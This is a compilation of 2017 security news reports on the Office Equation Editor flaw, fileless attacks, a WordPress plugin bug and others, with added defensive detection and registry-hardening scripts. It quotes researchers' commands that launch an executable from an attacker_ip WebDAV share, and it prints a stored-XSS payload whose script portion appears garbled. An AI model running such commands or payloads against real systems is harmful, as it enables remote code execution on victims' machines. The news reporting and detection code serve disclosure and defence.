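EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed sample chain: Word opens a document, the Equation Editor is
# instantiated as a COM server, and then (abnormally) launches a shell.
SAMPLE_EVENTS = [
    ProcEvent(4100, WINWORD, 880, EXPLORER, '"WINWORD.EXE" invoice.doc'),
    ProcEvent(4872, EQNEDT, 4100, WINWORD, '"EQNEDT32.EXE" -Embedding'),
    ProcEvent(5012, r"C:\Windows\System32\cmd.exe", 4872, EQNEDT,
              "cmd.exe /c echo constructed-sample"),
    ProcEvent(5020, r"C:\Windows\System32\notepad.exe", 880, EXPLORER, "notepad.exe"),
]

if __name__ == "__main__":
    for alert in detect_eqnedt_abuse(SAMPLE_EVENTS):
        print(f"[{alert.severity}] pid={alert.pid} {alert.reason}")
```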

The security researchers claim that they managed to create an exploit that would work with all Office versions released over the past 17 years, including Office 365, and which would impact all Windows versions, including Windows 10 Creators Update. Furthermore, the exploit would work on all architectures.

The most worrying aspect of the vulnerability is that the exploit doesn’t require user interaction for it to work, once the malicious document carrying the code is opened. In fact, the attack would not even interrupt a user’s work with Microsoft Office, the researchers claim.

“The only hindrance here is the protected view mode because it forbids active content execution (OLE/ActiveX/Macro). To bypass it cyber criminals use social engineering techniques. For example, they can ask a user to save a file to the Cloud (OneDrive, GoogleDrive, etc.). In this case, a file obtained from remote sources will not be marked with the MOTW (Mark of The Web) and, when a file is opened, the protected view mode will not be enabled,” Embedi notes.

This vulnerability, the researchers conclude, proves that EQNEDT32.EXE is an obsolete component that may contain other security weaknesses, possibly easily exploitable. Had standard security mitigation been used when compiling the file, the vulnerability wouldn’t be exploitable, the researchers say.

The vulnerability was reported to Microsoft in April 2017. The software giant addressed it this week, as part of its November 2017 Patch Tuesday.

Fileless Attacks Ten Times More Likely to Succeed: Report
16.11.2017 securityweek
A new report from the Ponemon Institute confirms, and quantifies, what most people already know: protecting endpoints is becoming more difficult, more complex and more time-consuming -- but not necessarily more successful.

Commissioned by endpoint protection firm Barkly, the report (PDF) confirms that defenders are increasingly moving away from primarily signature-based malware detection by replacing or supplementing existing defenses with additional protection or response capabilities. One third of respondents have replaced their existing AV product, while half of the respondents have retained their existing product but supplemented them with additional protections.

To combat both old and new defenses, attackers are responding with a new attack methodology -- the fileless attack. Ponemon notes that 29% of attacks in 2017 have been fileless. This is up from 20% in 2016, and is expected to increase to 35% in 2018.

The fileless attack does not install detectable files. These attacks, says Ponemon, "instead leverage exploits designed to run malicious code or launch scripts directly from memory, infecting endpoints without leaving easily-discoverable artifacts behind. Once an endpoint has been compromised, these attacks can also abuse legitimate system administration tools and processes to gain persistence, elevate privileges, and spread laterally across the network."

According to Ponemon, 54% of companies have experienced one or more successful attacks that have compromised data and/or infrastructure, while 77% of those attacks used exploits or fileless attacks. While the attack methodology has changed, the ultimate goal of the attacker has not. Ransomware, for example, remains a major problem. Half of the surveyed organizations have suffered a ransomware incident in 2017, while 40% of those have experienced multiple incidents. The average ransomware demand is now $3,675.

The implication from these figures is that bad guys can adapt to new security faster than good guys can adapt to new attacks. Barkly's CTO Jack Danahy doesn't believe that this is inevitable. "For us," he told SecurityWeek, "the problem is behavioral." Since the bad guys will always get better at obfuscating what they are doing, plus the reality that they have equal access to the technologies that the good guys use, "you know that they are going to look for ways to get around the entire class of defense."

Fileless attacks are the bad guys' response to traditional machine learning. When you look at the two bodies of technology, the older and the newer endpoint protection products, there's a common factor -- they are all file-based. They both still need a file to look at. This is what led to the development of fileless attacks. "We knew right from the beginning that we had to concentrate on stopping attacks because of their behavior, not because of any malware files they use. We had to find a way," he explained, "to identify really low-level, really early behaviors that are representative of when malware is trying to set itself up, before it can do any corrupting activity."

To do this, Barkly developed a system that examines both good behaviors and bad behaviors and is able to 'disambiguate' the two. "This is opposed to the standard method of looking for changes that have already happened or specific attributes of existing files in order to know that something bad is happening. That's too late," he said.

The end result is a SaaS product that updates its ability to differentiate between good and bad behavior on a daily basis -- using Barkly's own 'responsive machine-learning' (a combination of both supervised and unsupervised machine learning). "It's like a factory of bad behaviors and a factory of good behaviors, with machine learning to disambiguate the two," he said.

Users do not have a high opinion of most existing endpoint products, notes the Ponemon report. The average organization has seven different software agents on its endpoints to manage security, making it 'noisy and time-consuming'. Perhaps because of the growing number of products, 73% of organizations say it is getting more difficult to manage endpoint security, and two-thirds do not have the resources to do so adequately.

The biggest problem with most current solutions, according to the Ponemon study, is that they do not provide adequate protection. Danahy is not surprised. "You cannot claim to do endpoint protection unless you can stop both file-based and fileless attacks before they get through and harm the client. A fileless attack is ten times more likely to succeed than a file-based attack."

According to the study, the total cost of a successful attack is now over $5 million. The 'cost of a breach' is a contentious subject because of the variables concerned. Ponemon is known to take great care over its conclusions, but Danahy agrees it's a difficult concept. "That's why," he told SecurityWeek, "I insisted on the 'average cost per employee' being included." This figure stands at $301. It makes it easier for smaller firms to realistically consider the likely cost to themselves.

Ponemon's conclusion from the study is that organizations would "benefit from endpoint security solutions designed to block new threats like fileless attacks, which are responsible for the majority of today's endpoint compromises. To restore their faith in endpoint security's effectiveness, new solutions need to address this crucial gap in protection without adding unnecessary complexity to endpoint management."

Windows 10 Detects Reflective DLL Loading: Microsoft
16.11.2017 securityweek Safety
Windows 10 Creators Update can detect reflective Dynamic-Link Library (DLL) loading in a variety of high-risk processes, including browsers and productivity software, Microsoft says.

This is possible because of function calls (VirtualAlloc and VirtualProtect) related to procuring executable memory, which generate signals for Windows Defender Advanced Threat Protection (Windows Defender ATP).

Reflective DLL loading, the software giant explains, relies on loading a DLL into a process memory without using the Windows loader. First described in 2008, the method allows for the loading of a DLL into a process even if the DLL isn’t registered with the process.

The technique is employed by modern attacks to avoid detection, although the operation is not trivial, as it requires the use of a custom loader that can write the DLL into memory and then resolve its imports and/or its relocation.

What motivates attackers to use the method, Microsoft says, is that reflectively loading a DLL doesn’t require the DLL to reside on disk, and the library that is loaded may not be readily visible without forensic analysis, especially because it is not written to disk.

“A crucial aspect of reflectively loading a DLL is to have executable memory available for the DLL code. This can be accomplished by taking existing memory and changing its protection flags or by allocating new executable memory. Memory procured for DLL code is the primary signal we use to identify reflective DLL loading,” Christian Seifert, Windows Defender ATP Research, explains.

The detection model used in Windows 10 first learns about the normal allocations of a process, then it determines that a process associated with malicious activity allocates executable memory that deviates from the normal behavior. The model is meant to prove that memory events can be used as the primary signal for detecting reflective DLL loading, Seifert says.

The real model, however, also includes various other features, such as allocation size, allocation history, thread information, allocation flags, and the like. It also takes into consideration variations in application behavior, so its effectiveness is increased through additional behavioral signals, such as network connection behavior.

In an attack scenario where the victim opens a malicious Word document from a file share and enables macro code to run, the Word process connects to the attacker-specified command and control (C&C) server to fetch the DLL to be reflectively loaded. Once the loading has been completed, it connects to the C&C and provides command line access to the victim machine.

Windows Defender ATP, Microsoft says, identifies the memory allocations as abnormal and alerts on the matter, providing context on the document and information on the C&C communication. Similarly, Microsoft Office 365 Advanced Threat Protection prevents such attacks through dynamic behavior matching.
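As an added illustration of the baseline-then-deviation idea described above (example code written here; it is not Microsoft's model or Windows Defender ATP code, which uses many more features), the detector below learns the size of a process's benign executable allocations and flags an executable allocation that deviates, raising severity when the same process also makes an outbound connection. The events, the log2 z-score with a 3-sigma threshold, and the outbound-connection side signal are constructed assumptions.

```python
# Added example (not Microsoft's model or Windows Defender ATP code): a
# baseline-then-deviation detector built on the signal the article names,
# executable memory procured through VirtualAlloc / VirtualProtect. Sizes are
# compared on a log2 scale with a z-score; the events, the 3-sigma threshold and
# the "outbound connection" side signal are constructed assumptions.
import math
import statistics
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set, Tuple

EXEC_PROTECTS = {"PAGE_EXECUTE", "PAGE_EXECUTE_READ",
                 "PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY"}


@dataclass(frozen=True)
class MemEvent:
    image: str      # process image name, e.g. "winword.exe"
    api: str        # "VirtualAlloc" or "VirtualProtect"
    size: int       # region size in bytes
    protect: str    # requested page protection


class ExecMemBaseline:
    """Per-process profile of how large benign executable allocations are."""

    def __init__(self, min_samples: int = 5) -> None:
        self.min_samples = min_samples
        self._log_sizes: Dict[str, List[float]] = defaultdict(list)

    def learn(self, events: Iterable[MemEvent]) -> None:
        for ev in events:
            if ev.protect in EXEC_PROTECTS:
                self._log_sizes[ev.image.lower()].append(math.log2(ev.size))

    def score(self, ev: MemEvent) -> Tuple[float, str]:
        """Return (score, reason); a score of 1.0 or more deviates from baseline."""
        if ev.protect not in EXEC_PROTECTS:
            return 0.0, "non-executable memory, not a signal"
        samples = self._log_sizes.get(ev.image.lower(), [])
        if len(samples) < self.min_samples:
            return 1.0, f"{ev.image} has no executable-memory baseline"
        mean = statistics.mean(samples)
        sd = statistics.pstdev(samples) or 0.5   # floor for degenerate baselines
        z = abs(math.log2(ev.size) - mean) / sd
        return z / 3.0, f"{ev.api} {ev.size} bytes {ev.protect}: z={z:.1f}"


def triage(baseline: ExecMemBaseline, events: Iterable[MemEvent],
           outbound_images: Set[str]) -> List[Tuple[str, str, str]]:
    """Combine the memory signal with a second behavioural signal: processes in
    outbound_images made a network connection after allocating (as the Word
    process in the article does when it reaches back to its C&C server)."""
    alerts = []
    for ev in events:
        score, reason = baseline.score(ev)
        if score >= 1.0:
            severity = "high" if ev.image.lower() in outbound_images else "medium"
            alerts.append((severity, ev.image.lower(), reason))
    return alerts


# Constructed benign history: Word occasionally allocates small executable
# regions (thunks, JIT-style stubs), never anything near a full DLL image.
BASELINE_EVENTS = [MemEvent("winword.exe", "VirtualAlloc", s, "PAGE_EXECUTE_READ")
                   for s in (4096, 8192, 4096, 12288, 8192, 4096)]

# Constructed test window: a large RWX region in Word followed by an outbound
# connection, plus an executable allocation in Excel with no history at all.
TEST_EVENTS = [
    MemEvent("winword.exe", "VirtualAlloc", 1048576, "PAGE_READWRITE"),
    MemEvent("winword.exe", "VirtualAlloc", 8192, "PAGE_EXECUTE_READ"),
    MemEvent("winword.exe", "VirtualProtect", 1572864, "PAGE_EXECUTE_READWRITE"),
    MemEvent("excel.exe", "VirtualAlloc", 65536, "PAGE_EXECUTE_READWRITE"),
]
OUTBOUND_IMAGES = {"winword.exe"}


def run_demo() -> List[Tuple[str, str, str]]:
    baseline = ExecMemBaseline()
    baseline.learn(BASELINE_EVENTS)
    return triage(baseline, TEST_EVENTS, OUTBOUND_IMAGES)


if __name__ == "__main__":
    for severity, image, reason in run_demo():
        print(f"[{severity}] {image}: {reason}")
```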

Seifert also points out that Windows Defender ATP is a post-breach solution designed to alert on detected hostile activity. It can also provide detailed event timelines and other contextual information for attack analysis, the researcher says.

Formidable Forms plugin vulnerabilities expose WordPress sites to attacks
16.11.2017 securityaffairs

A researcher from Finland-based company Klikki Oy has discovered several vulnerabilities in the Formidable Forms plugin that expose websites to attacks.
The researcher Jouko Pynnönen from Finland-based company Klikki Oy has discovered several vulnerabilities in the Formidable Forms plugin that expose websites to attacks.

The Formidable Forms plugin allows users to easily create contact pages, polls and surveys, and many other kinds of forms; it has more than 200,000 active installs.

Pynnönen discovered that the dangerous flaws affect both the free and the paid version.

The most severe issue discovered by the expert is a blind SQL injection that can be exploited by attackers to enumerate a website’s databases and access their content, including user credentials and data submitted to a website via Formidable forms.

Unfortunately, this isn’t the only flaw of this type: the researcher also found another flaw that exposes data submitted via forms created with the Formidable Forms plugin. Both vulnerabilities are related to the way the plugin implements shortcodes.

“The plugin implemented a form preview AJAX function accessible to anyone without authentication. The function accepted some parameters affecting the way it generates the form preview HTML. Parameters after_html and before_html could be used to add custom HTML after and before the form. Most of the vulnerabilities relied on this feature.” wrote Pynnonen.


The Formidable Forms plugin is also affected by reflected and stored cross-site scripting (XSS) vulnerabilities. The stored XSS could be exploited by an attacker to execute arbitrary JavaScript code in the context of an administrator’s browsing session. An attacker can inject malicious code via forms; the code is executed when the site admin views the entry on the dashboard.

“Administrators can view data entered by users in Formidable forms in the WordPress Dashboard. Any HTML entered in forms is filtered with the wp_kses() function. This isn’t enough to prevent dangerous HTML as it allows the “id” and “class” HTML attributes and e.g. the <form> HTML tag. It was possible to craft HTML code which would result in attacker-supplied JavaScript to be executed when the form entry is viewed.” added the expert.

Below is the example shared by the expert:

<form id=tinymce><textarea name=DOM> </textarea></form>
<a class=frm_field_list>panelInit</a>
<a id="frm_dyncontent"> <b id="xxxdyn_default_valuexxxxx" class="ui-find-overlay wp-editor-wrap">overlay</b></a>
<a id=post-visibility-display>vis1</a><a id=hidden-post-visibility>vis2</a><a id=visibility-radio-private>vis3</a>
<div id=frm-fid-search-menu><a id=frm_dynamic_values_tab>zzz</a></div>
<form id=posts-filter method=post action=admin-ajax.php?action=frm_forms_preview>
<textarea name=before_html>&lt;svg on[entry_key]loaad=ler(t/xss/) <//te&xtagt;rea></form>
The expert also discovered that if the WordPress installation includes the iThemes Sync WordPress maintenance plugin alongside Formidable Forms, an attacker can exploit the SQL injection flaw to obtain a user’s ID and authentication key.

The user’s ID and the authentication key can be used to control WordPress via iThemes Sync.

Formidable Forms promptly fixed the flaws with the release of versions 2.05.02 and 2.

The expert identified the issues as part of a bug bounty program offering rewards of up to $10,000; the initiative, managed through HackerOne, was run by an unnamed Singapore-based tech company. The Formidable Forms plugin is one of the software products used by the tech company.

The researcher received a $4,500 reward for the SQL injection vulnerability and a few hundred dollars for each of the other security holes.

Multi-Stage Android/TrojanDropper.Agent.BKY Malware bypasses Google Play detection once again
16.11.2017 securityaffairs Android

Researchers from security firm ESET discovered a multi-stage malware family dubbed Android/TrojanDropper.Agent.BKY that evaded Google Play detection.
Security experts at ESET have discovered a multi-stage Android malware, tracked as Android/TrojanDropper.Agent.BKY, that was available for download in the official Google Play store.

The researchers found eight malicious applications in the official application store (MEX Tools, Clear Android, Cleaner for Android, World News, WORLD NEWS, World News PRO, Игровые Автоматы Слоты Онлайн, and Слоты Онлайн Клуб Игровые Автоматы); they appear to be legitimate applications and use advanced anti-detection features.

“Detected by ESET security systems as Android/TrojanDropper.Agent.BKY, these apps form a new family of multi-stage Android malware, legitimate-looking and with delayed onset of malicious activity.” states the analysis published by ESET.

The experts highlighted the advanced anti-detection features implemented by these apps, which were downloaded by only several hundred users.

The Android/TrojanDropper.Agent.BKY samples analyzed by ESET employ a multi-stage architecture along with encryption.

Once downloaded and installed, the malicious apps do not request any suspicious permissions and even mimic the activity they were supposed to.

In the background, the apps decrypt and execute a first-stage payload designed to decrypt and execute the second-stage payload from the assets of the app downloaded from Google Play.

The malware implements obfuscatory measures to remain under the radar.

The second-stage payload downloads a malicious application from a hardcoded URL; it waits around 5 minutes before asking the user to install the third-stage payload, which masquerades as Adobe Flash Player or another popular app.

“The app downloaded by the second-stage payload is disguised as well-known software like Adobe Flash Player or as something legitimate-sounding yet completely fictional – for example “Android Update” or “Adobe Update”. In any case, this app’s purpose is to drop the final payload and obtain all the permissions that payload needs for its malicious actions.” continues the analysis.

Once the third-stage payload is installed it decrypts and executes the final fourth-stage payload that was a mobile banking Trojan.

The Trojan displays fake login forms to steal the victim’s credentials or credit card details.

Experts noticed that one of the malicious apps downloads the Trojan using the bit.ly URL shortener; this allowed them to discover that the link had been used almost 3000 times as of November 14, and that most of the connections came from infected hosts in the Netherlands.

Two of the most recent samples of the TrojanDropper malware were observed dropping either the MazarBot banking Trojan or spyware.

ESET suggests that impacted users first deactivate the admin rights for the installed payload, then uninstall the installed payload and the app initially downloaded from the Play Store.

Further technical details, including the IoCs are included in the report published by ESET.

“Unfortunately, multi-stage downloaders, with their improved obfuscation features, have a better chance of sneaking into official app stores than common Android malware does.” concluded ESET. “Users who want to stay protected should not rely fully on the stores’ protections; instead, it’s crucial for users to check app ratings and comments, pay attention to what permissions they grant to apps, and run a quality security solution on their mobile devices.”

Forever 21 Warns Shoppers of Payment Card Breach at Some Stores
15.11.2017 thehackernews Crime

Another day, another data breach. This time a fast-fashion retailer has fallen victim to a payment card breach.
American clothes retailer Forever 21 announced on Tuesday that the company had suffered a security breach that allowed unknown hackers to gain unauthorized access to data from payment cards used at a number of its retail locations.
The Los Angeles based company, which operates over 815 stores in 57 countries, didn't say which of its stores were affected, but it did note that customers who shopped between March and October this year may be affected.
Forever 21 learned of the breach after the retailer received a report from a third-party monitoring service, suggesting there may have been "unauthorized access to data from payment cards that were used at certain FOREVER 21 stores."
Besides this, the company also revealed that it implemented encryption and token-based authentication systems in 2015 that are intended to protect transaction data on its point-of-sale (PoS) machines in its stores.
However, because these security layers were not functioning on certain PoS devices, hackers were able to gain unauthorized access to data from payment cards at some Forever 21 stores, the company admitted.
Since the investigation of its payment card systems is still ongoing, complete findings of the incident, including the number of customers potentially affected, are not available at the moment.
"Forever 21 immediately began an investigation of its payment card systems and engaged a leading security and forensics firm to assist," the US clothing retailer said while announcing the data breach.
"We regret that this incident occurred and apologize for any inconvenience. We will continue to work to address this matter."
Meanwhile, customers who shopped at Forever 21 are advised to monitor their payment card statements carefully and immediately notify the bank that issued the card of any unauthorized charge.
This incident is yet another embarrassing breach disclosed recently, following Disqus' disclosure of a 5-year-old breach in which hackers stole details of over 17.5 million users and Yahoo's disclosure that its 2013 data breach affected all 3 billion of its users.
The recent incidents also include Equifax's disclosure of a breach of potentially 145.5 million customers, U.S. Securities and Exchange Commission (SEC) disclosure of a breach that profited hackers, and Deloitte's revelation of a cyber attack that resulted in the theft of its clients' private emails and documents.

Firefox 57 "Quantum" Released – 2x Faster Web Browser
15.11.2017 thehackernews IT

It is time to give Firefox another chance.
The Mozilla Foundation today announced the release of its much awaited Firefox 57, aka Quantum web browser for Windows, Mac, and Linux, which claims to defeat Google's Chrome.
It is fast. Really fast. Firefox 57 is based on an entirely revamped design and overhauled core that includes a brand new next-generation CSS engine written in Mozilla’s Rust programming language, called Stylo.
Firefox 57 "Quantum" is the first web browser to utilize the power of multicore processors and offers a 2x faster browsing experience while consuming 30 percent less memory than Google Chrome.
Besides fast performance, Firefox Quantum, which Mozilla calls "by far the biggest update since Firefox 1.0 in 2004," also brings massive performance improvements with tab prioritization, and significant visual changes with a completely redesigned user interface (UI), called Photon.

This new version also adds support for AMD VP9 hardware video decoding during playback in an attempt to reduce power consumption, and thus keep your system from running out of battery.
Firefox 57 also includes built-in screenshot functionality, improved tracker blocking and support for WebVR to enable websites to take full advantage of VR headsets.
Firefox has plans to speed things even further by leveraging modern GPUs in the near future.
Firefox Quantum for the desktop version is available for download now on Firefox's official website, and all existing Firefox users should be able to upgrade to the new version automatically.
However, the Android version of Firefox 57 is rolling out on Google Play in coming days, and its iOS version should eventually arrive on Apple's official App Store.

Patch Tuesday: Microsoft Releases Update to Fix 53 Vulnerabilities
15.11.2017 thehackernews

It's Patch Tuesday—time to update your Windows devices.
Microsoft has released a large batch of security updates as part of its November Patch Tuesday to fix a total of 53 new security vulnerabilities in various Windows products, 19 of which are rated critical, 31 important and 3 moderate.
The vulnerabilities impact the Windows OS, Microsoft Office, Microsoft Edge, Internet Explorer, Microsoft Scripting Engine, .NET Core, and more.
At least four of these vulnerabilities that the tech giant has now fixed have public exploits, allowing attackers to exploit them easily. But fortunately, none of the four are being used in the wild, according to Gill Langston at security firm Qualys.
The four vulnerabilities with public exploits are identified by Microsoft as CVE-2017-8700 (an information disclosure flaw in ASP.NET Core), CVE-2017-11827 (Microsoft browsers remote code execution), CVE-2017-11848 (Internet Explorer information disclosure) and CVE-2017-11883 (denial of service affecting ASP.NET Core).
Potentially Exploitable Security Vulnerabilities
What's interesting about this month's Patch Tuesday is that none of the Windows OS patches are rated Critical. However, the Device Guard Security Feature Bypass Vulnerability (CVE-2017-11830) and the Privilege Elevation flaw (CVE-2017-11847) are ones you should focus on.
Also, according to an analysis of Patch Tuesday fixes by Zero-Day Initiative, CVE-2017-11830 and another flaw identified as CVE-2017-11877 can be exploited to spread malware.
"CVE-2017-11830 patches a Device Guard security feature bypass vulnerability that would allow malware authors to falsely authenticate files," Zero-Day Initiative said.
"CVE-2017-11877 fixes an Excel security feature bypass vulnerability that fails to enforce macro settings, which are often used by malware developers."
The tech giant also fixed six remote code execution vulnerabilities that exist "in the way the scripting engine handles objects in memory in Microsoft browsers."
Microsoft identified these vulnerabilities as CVE-2017-11836, CVE-2017-11837, CVE-2017-11838, CVE-2017-11839, CVE-2017-11871, and CVE-2017-11873, which could corrupt memory in such a way that attackers could execute malicious code in the context of the current user.
"In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website," Microsoft said. "These websites could contain specially crafted content that could exploit the vulnerability."
17-Year-Old MS Office Flaw Lets Hackers Install Malware
Also, you should be extra careful when opening files in MS Office.
All versions of Microsoft Office released in the past 17 years were found to be vulnerable to a remote code execution flaw (CVE-2017-11882) that works against all versions of the Windows operating system, including the latest Microsoft Windows 10 Creators Update.
Due to improper memory operations, the affected Office component fails to properly handle objects in memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user.
Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad, which could allow attackers to remotely install malware on targeted computers.
Adobe Patch Tuesday: Patches 62 Vulnerabilities
Besides fixing vulnerabilities in its various products, Microsoft has also released updates for Adobe Flash Player.
These updates correspond with Adobe update APSB17-33, which patches 62 CVEs for Acrobat and Reader alone. Flash Player users are therefore advised to ensure that they update Adobe software across their environment to stay protected.
It should also be noted that last Patch Tuesday, Microsoft quietly released the patch for the dangerous KRACK vulnerability (CVE-2017-13080) in the WPA2 wireless protocol.
Therefore, users are also recommended to make sure that their systems have last month's security patches installed.
Users are also strongly advised to apply the November security patches as soon as possible in order to keep hackers and cybercriminals from taking control of their computers.
For installing security updates, just head on to Settings → Update & security → Windows Update → Check for updates, or you can install the updates manually.

17-Year-Old MS Office Flaw Lets Hackers Install Malware Without User Interaction
15.11.2017 thehackernews

You should be extra careful when opening files in MS Office.
While the world is still dealing with the threat posed by the 'unpatched' DDE feature built into Microsoft Office, researchers have uncovered a serious issue with another Office component that could allow attackers to remotely install malware on targeted computers.
The vulnerability is a memory-corruption issue that resides in all versions of Microsoft Office released in the past 17 years, including Microsoft Office 365, and works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.
Discovered by security researchers at Embedi, the vulnerability leads to remote code execution, allowing an unauthenticated, remote attacker to execute malicious code on a targeted system without requiring any user interaction beyond opening a malicious document.
The vulnerability, identified as CVE-2017-11882, resides in EQNEDT32.EXE, an MS Office component which is responsible for insertion and editing of equations (OLE objects) in documents.
However, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user.
Seventeen years ago, EQNEDT32.EXE was introduced in Microsoft Office 2000, and it has been kept in all versions released after Microsoft Office 2007 in order to ensure the software remains compatible with documents created by older versions.
DEMO: Exploitation Allows Full System Take Over


Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software.
This vulnerability could be exploited to take complete control over a system when combined with Windows Kernel privilege escalation exploits (like CVE-2017-11847).
Possible Attack Scenario:
While explaining the scope of the vulnerability, Embedi researchers suggested several attack scenarios listed below:
"By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it)."
"One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker."
"Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient."
"After that, an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service."
Protection Against Microsoft Office Vulnerability
With this month's Patch release, Microsoft has addressed this vulnerability by changing how the affected software handles objects in memory.
So, users are strongly recommended to apply the November security patches as soon as possible to keep hackers and cybercriminals from taking control of their computers.
Since this component has had a number of security issues that are easily exploited, disabling it could be the best way to ensure your system's security.
Users can run the following command in the command prompt to disable the component's registration in the Windows registry:
reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
For 32-bit Microsoft Office package in x64 OS, run the following command:
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
Besides this, users should also enable Protected View (the Microsoft Office sandbox) to prevent active content (OLE/ActiveX/macro) from executing.
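The two reg add commands above set the kill-bit for one CLSID in two registry hives and give no feedback on what was already there. The following PowerShell script, added here as an example and not part of the article or of any Microsoft guidance, audits both locations for that CLSID and, with -Apply, sets the 0x400 flag. The CLSID, key paths and flag value are the ones from the article; one deliberate difference is that the script ORs 0x400 into any existing flags rather than overwriting the value as reg add /d does.

```powershell
# Added example (not from the article): audit and optionally apply the
# "Compatibility Flags" = 0x400 kill-bit for the Equation Editor CLSID
# quoted in the article, in both the native and the Wow6432Node
# COM Compatibility keys. Run from an elevated PowerShell prompt; without
# -Apply the script only reports.
param([switch]$Apply)

$Clsid   = '{0002CE02-0000-0000-C000-000000000046}'   # CLSID from the article
$KillBit = 0x400                                       # flag value from the article
$Paths = @(
    "HKLM:\SOFTWARE\Microsoft\Office\Common\COM Compatibility\$Clsid",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\$Clsid"
)

foreach ($Path in $Paths) {
    $current = $null
    if (Test-Path $Path) {
        $current = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' `
                        -ErrorAction SilentlyContinue).'Compatibility Flags'
    }
    # The value is a bitmask: the component counts as disabled only if 0x400 is set.
    $disabled = ($null -ne $current) -and (($current -band $KillBit) -eq $KillBit)
    if ($disabled) {
        Write-Output ("[OK]      {0} already has 0x400 set (value 0x{1:X})" -f $Path, $current)
        continue
    }
    Write-Output "[MISSING] $Path"
    if ($Apply) {
        if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
        # $null -bor 0x400 evaluates to 0x400, so a missing value is handled too.
        New-ItemProperty -Path $Path -Name 'Compatibility Flags' -PropertyType DWord `
            -Value ($current -bor $KillBit) -Force | Out-Null
        Write-Output "[APPLIED] $Path"
    }
}
```

On a 32-bit Windows install the Wow6432Node path does not normally exist; the script will report it as missing and, with -Apply, create it, which is harmless but can be skipped by trimming $Paths. Re-running without -Apply afterwards is the verification step.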

Forever 21 Investigating Payment Card Breach
15.11.2017 securityweek  Cyber
Los Angeles-based fashion retailer Forever 21 informed customers on Tuesday that it has launched an investigation into a security incident involving payment systems.

The company said it recently learned from a third-party that credit and debit cards used at certain Forever 21 stores may have been compromised.

An investigation has been launched and a cybersecurity and forensics firm has been called in to assist. Forever 21 has provided few details about the incident, but noted that its investigation focuses on transactions made between March and October 2017.

The company has promised to share more information, including the list of affected stores and timeframes, in the upcoming period. It did, however, highlight that security mechanisms implemented in many of its stores made stealing payment card information difficult.

“Because of the encryption and tokenization solutions that Forever 21 implemented in 2015, it appears that only certain point of sale devices in some Forever 21 stores were affected when the encryption on those devices was not in operation,” the company said in a statement.

In the meantime, the company has advised customers to keep a close eye on credit card statements and immediately notify their bank of any unauthorized charges.

Forever 21 operates over 800 stores in 57 countries around the world. The company is the 5th largest specialty retailer in the United States.

“With its endless POS endpoints, the retail industry has always been a desirable target for cybercriminals,” said Mark Cline, a VP at managed security services firm Netsurion. “They know that if they can introduce malware into POS networks, they can make a decent amount of cash by selling credit card numbers on the dark web. With their millions of customers, large retailers, like Forever 21, have typically been the hardest hit. Companies must pay up to $172 per stolen record in clean-up costs.”

“If retail businesses haven’t hardened their IT and POS security, they should start now to protect themselves from POS malware, ransomware and other threats—especially as we move into the holiday shopping season,” Cline added. “They may be running anti-virus software and managed firewalls, but they may or may not be running a strong offense with active monitoring and threat detection.”

Forever 21 is not the only clothing retailer to report a payment card breach this year. Brooks Brothers and Buckle also reported finding malware on their payment systems. Eddie Bauer informed customers of a cyber intrusion last year.

Flaw in Siemens RTU Allows Remote Code Execution
15.11.2017 securityweek 
Potentially serious vulnerabilities have been found in some Siemens SICAM remote terminal unit (RTU) modules, but patches will not be released as the product has been discontinued.

Researchers at IT security services and consulting company SEC Consult discovered the flaws in the SICAM RTU SM-2556 COM modules, which can be attached to SICAM 1703 and RTU substation controllers for LAN/WAN communications. The product is used worldwide in the energy and other sectors.

The most serious of the security holes is CVE-2017-12739, a critical vulnerability in the integrated web server that allows an unauthenticated attacker with network access to remotely execute code on affected devices.

The web server is also impacted by a reflected cross-site scripting (XSS) vulnerability that can be exploited by getting the targeted user to click on a link (CVE-2017-12738), and a flaw that can be exploited by a remote attacker to bypass authentication and obtain sensitive device information, including passwords (CVE-2017-12737).

The vulnerabilities affect devices running firmware versions ENOS00, ERAC00, ETA2, ETLS00, MODi00 and DNPi00. Since the product has been discontinued, Siemens has decided not to release patches. However, users can prevent potential attacks by disabling the affected web server, which is designed for diagnostics and is not needed for normal operation.

Siemens pointed out, however, that the vulnerable versions of the firmware may also be running on the SM-2558 COM module, the successor of SM-2556. The automation giant has advised customers to update to the newer ETA4, MBSiA0 and DNPiA1 firmware versions.

In its own advisory, SEC Consult said it reported the vulnerabilities to Siemens in late September. According to the company, the GoAhead web server used by the RTU module was released in October 2003 and is affected by several known vulnerabilities.

SEC Consult has published proof-of-concept (PoC) code for the authentication bypass and XSS vulnerabilities.

Researchers haven’t found many vulnerabilities in Siemens SICAM products. ICS-CERT has only published a handful of advisories in the past years, but they mostly describe high severity and critical flaws.

New IcedID Banking Trojan Emerges
15.11.2017 securityweek 
A newly discovered banking Trojan called IcedID was built with a modular design and modern capabilities when compared to older financial threats, IBM X-Force warns.

